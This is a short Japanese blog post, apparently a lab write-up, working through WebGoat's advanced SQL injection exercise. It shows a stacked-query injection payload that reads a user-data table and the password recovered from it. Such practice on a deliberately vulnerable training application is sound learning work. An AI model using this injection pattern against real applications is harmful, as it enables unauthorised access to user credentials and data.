Shikata Ga Nai

Private? There is no such things.

WebGOATでSQL Injection (advanced)⓷を演習してみた

Hello there, ('ω')ノ

 

WebGOATでSQL Injection (advanced)⓷を選択して。

まずは、よくあるパターンで下記を入力して動作確認を。

 '

 

f:id:ThisIsOne:20200723091729p:plain

 

下記のSQL文を発行すると情報を得ることができて。

 a'; select * from user_system_data; --

 

f:id:ThisIsOne:20200723084655p:plain

 

得られた情報からパスワードを入力してクリアできた。

 passW0rD

 

f:id:ThisIsOne:20200723085003p:plain

 

Best regards, (^^ゞ